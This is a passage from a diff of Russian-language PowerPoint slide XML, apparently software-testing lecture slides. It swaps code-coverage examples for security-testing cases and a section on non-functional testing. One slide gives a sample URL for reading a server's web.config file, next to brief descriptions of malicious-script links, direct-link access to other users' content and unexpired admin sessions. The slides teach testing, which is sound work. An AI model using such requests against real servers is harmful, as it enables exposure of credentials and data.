-              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
-              <a:t>выполнение каждого оператора</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> программы по крайней мере один раз.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr rtl="0"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Рассмотрим пример:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr rtl="0"/>
-            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:buFontTx/>
+              <a:rPr lang="ru-RU" b="0" u="none" dirty="0" smtClean="0"/>
+              <a:t>Злоумышленник</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> размещает ссылку на сайт, содержащий вредоносный </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="0" u="none" baseline="0" dirty="0" err="1" smtClean="0"/>
+              <a:t>скрипт</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>. Например есть форум, на котором люди обмениваются мыслями, ссылками. Будет на форуме ссылка</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>на сайт, где возможно выполнить вредоносный </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="0" u="none" baseline="0" dirty="0" err="1" smtClean="0"/>
+              <a:t>скрипт</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="228600" indent="-228600">
               <a:buNone/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>void</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>func</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>int</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>a</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>int</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>b</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>float</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>x</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>) </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:buFontTx/>
+              <a:rPr lang="ru-RU" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>3) Можно </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="0" u="none" baseline="0" dirty="0" err="1" smtClean="0"/>
+              <a:t>доступиться</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> до файлов на сервере, например, написав </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>http://testsite/web.config</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="228600" indent="-228600">
               <a:buNone/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>{ </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:buFontTx/>
+              <a:rPr lang="ru-RU" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>4) Пользователь А имеет право смотреть все статьи сайта. Пользователь В может смотреть только свои статьи. Он не видит чужие статьи в общем списке. Но есть он напишет прямую ссылку на чужую статью, он может прочитать ее.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="228600" indent="-228600">
               <a:buNone/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>	</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>if</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> ((</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>a</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> &gt; 1) &amp;&amp; (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>b</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> == 0)) </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:buFontTx/>
+              <a:rPr lang="ru-RU" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>5) Должна быть возможность определить, кто выполнял определенные манипуляции на сайте. Например, кто-то удалил запись с сайта, но нет возможности проверить, кто именно это сделал. Это плохо.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="228600" indent="-228600">
               <a:buNone/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>		</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>x</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>x</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>a</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:buFontTx/>
+              <a:rPr lang="ru-RU" b="0" u="none" dirty="0" smtClean="0"/>
+              <a:t>6) Например</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> администратор сайта вносил изменения на сайте. Он закрыл браузер, ушел. На его рабочее место пришел злоумышленник. Открыл браузер, без логина попал на сайт, и он имеет права администратора.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="228600" indent="-228600">
               <a:buNone/>
             </a:pPr>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>	</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>if</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>a</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> == 2 || </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>x</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> &gt; 1) </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:buFontTx/>
+            <a:endParaRPr lang="ru-RU" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="228600" indent="-228600">
               <a:buNone/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>		</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>x++</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:buFontTx/>
+              <a:rPr lang="ru-RU" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>Для тестирования безопасности существует масса инструментов.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="228600" indent="-228600">
               <a:buNone/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>} </a:t>
-            </a:r>
+              <a:rPr lang="ru-RU" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>Рассмотрим на примере </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="0" u="none" baseline="0" dirty="0" err="1" smtClean="0"/>
+              <a:t>Netsparker</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="228600" indent="-228600">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" b="0" u="none" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" b="0" u="none" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
             <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr rtl="0"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Чтобы выполнить каждый оператор не менее одного раза, нужно составить единственный тест со следующими значениями входных данных (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>a</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> = 2 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>b</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> = 0 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>x</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> = 3).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr rtl="0"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Данный подход обладает недостатками. Вот, например, если в условии </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>x</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>&gt;</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> 1 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
-                <a:hlinkClick r:id="rId3" tooltip="Программист"/>
-              </a:rPr>
-              <a:t>программист</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> допускает ошибку и пишет </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>x</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>&lt;</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> 1 или </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>x</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>&gt; -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> 1, то с помощью нашего теста эта ошибка не будет обнаружена.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>покрытия методом решений </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>необходимо составить такое число тестов, при которых каждое условие в программе примет как истинное значение, так и ложное значение.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Например, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>a = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>3</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> b = 0, x = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>4 (условие </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>((</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>a</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> &gt; 1) &amp;&amp; (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>b</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> == 0)) будет истинно</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> и условие </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>((</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>a</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> == 2 )||( </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>x</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> &gt; 1)) будет истинно</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>И </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>a = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>3</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> b = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>1</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>, x = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>0 (условие </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>((</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>a</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> &gt; 1) &amp;&amp; (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>b</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> == 0)) будет ложно</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> и условие </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>((</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>a</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> == 2 )||( </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>x</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> &gt; 1)) будет ложно</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>Если программист ошибется в условии </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>a==2</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>, то с помощью наших тестов ошибка опять же не будет обнаружена.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>Для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>покрытия условий</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>, все условия (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>a&gt;1, b==0, a==2, x&gt;1</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>должны принимать и ложное, и истинное значения.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>a=2,  b=</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>1</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>, x=2</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>a=0,  b=</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>0</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>, x=0</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>При таком подходе, некоторые операторы могут не выполниться ни разу. Для более полного теста необходимо добавлять, что все операторы должны выполниться хотя бы один раз (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>комбинаторное покрытие условий</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -3486,7 +1734,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>После того, как дефект обнаружен и исправлен, программу необходимо перепроверить, чтобы убедиться, что исходный дефект успешно устранен. Это называется подтверждением. </a:t>
+              <a:t>Нефункциональное тестирование включает, но не ограничивается, нагрузочное тестирование, тестирование производительности, стресс-тестирование, тестирование удобства использования, тестирование восстановления, тестирование надежности и тестирование переносимости. </a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -3495,7 +1743,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Отладка (локализация и исправление дефекта) относится к процессу разработки, а не тестирования. </a:t>
+              <a:t>Это тестирование того, «как» система работает. </a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -3504,7 +1752,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Регрессионное тестирование – это повторное тестирование уже протестированных программ после внесения в них изменений, чтобы обнаружить дефекты, внесенные или пропущенные  в результате этих действий. </a:t>
+              <a:t>Нефункциональное тестирование может выполняться на всех уровнях тестирования. </a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -3513,7 +1761,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Эти дефекты могут быть как в проверяемом компоненте, так и в связанном или несвязанным с ним. </a:t>
+              <a:t>Термин нефункциональное тестирование описывает тесты, необходимые для оценки характеристик систем и программ, которые могут быть количественно измерены, такие как время отклика при тестировании производительности. Эти тесты могут ссылаться на модели качества, такие как «Разработка программного обеспечения – Качество программного продукта» (ISO 9126). </a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -3522,19 +1770,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Регрессионное тестирование выполняется, когда в программное обеспечение или его окружение вносятся изменения. </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Глубина регрессионного тестирования оценивается риском пропуска  дефектов в программном обеспечении, которое работало ранее.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Тесты должны быть повторяемыми, если они должны использоваться для подтверждающего или регрессионного тестирования. </a:t>
+              <a:t>Нефункциональное тестирование рассматривает внешнее поведение программного обеспечения и в большинстве случаев использует разработку тестов методом черного ящика. </a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -3543,7 +1779,220 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Регрессионное тестирование может выполняться на всех уровнях тестирования и включает функциональное, нефункциональное и структурное тестирование. </a:t>
+              <a:t>Нагрузочное</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> тестирование (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>load testing</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>) – вид тестирование производительности, проводимый с целью оценить поведение компонента или системы под увеличивающейся нагрузкой (число одновременно работающих пользователей </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" err="1" smtClean="0"/>
+              <a:t>и\</a:t>
+            </a:r>
+            <a:r>
